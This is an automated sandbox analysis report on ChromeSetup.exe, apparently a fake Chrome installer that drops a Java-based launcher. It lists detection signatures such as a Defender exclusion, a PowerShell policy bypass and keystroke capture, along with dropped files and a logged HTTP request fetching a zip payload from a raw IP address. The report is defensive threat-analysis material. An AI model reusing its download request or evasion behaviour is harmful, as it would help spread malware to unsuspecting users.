Windows Analysis Report
ChromeSetup.exe

Overview

General Information

Sample name: ChromeSetup.exe
Analysis ID: 1631885
MD5: 399c3320b324ff609891de75be32bf73
SHA1: 70aed741554513d96f31109033f8e4fff17e7633
SHA256: 7544df9edd35749e132b8f586cef88127dcbea491ab128271fc3b2abd94e01d5
Tags: exe, user-aachum

Detection

Score: 63
Range: 0 - 100
Confidence: 100%

Compliance

Score: 34
Range: 0 - 100

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious PE digital signature
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Classification diagram (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious)

AV Detection

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe Avira: detection malicious, Label: TR/AVI.Agent.wukun
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe ReversingLabs: Detection: 47%
Source: ChromeSetup.exe ReversingLabs: Detection: 47%
Source: ChromeSetup.exe Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\ChromeSetup.exe EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe

Compliance

Source: C:\Users\user\Desktop\ChromeSetup.exe EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe
Source: ChromeSetup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Users\user\Desktop\ChromeSetup.exe File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt
Source: ChromeSetup.exe Static PE information: certificate valid
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll
Source: ChromeSetup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source: Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\ChromeSetup.exe File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\
Source: unknown TCP traffic detected without corresponding DNS query: 91.208.197.238 (50 identical events)
Source: global traffic HTTP traffic detected (11 identical requests):
GET /dapp/partdevelopment.zip HTTP/1.1
User-Agent: Java/1.8.0_101
Host: 91.208.197.238
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Source: javaw.exe, 00000002.00000002.3384324223.0000000004DCA000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004B07000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://91.208.197.238
Source: javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.208.197.238/dapp/partdevelopment.zip
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decllver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionG
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsx
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments1
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesX
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth;
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdA
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs:
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantg/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default=
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef3
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xincludeC
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizetp://a
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor7
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner7
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler=
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter8
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
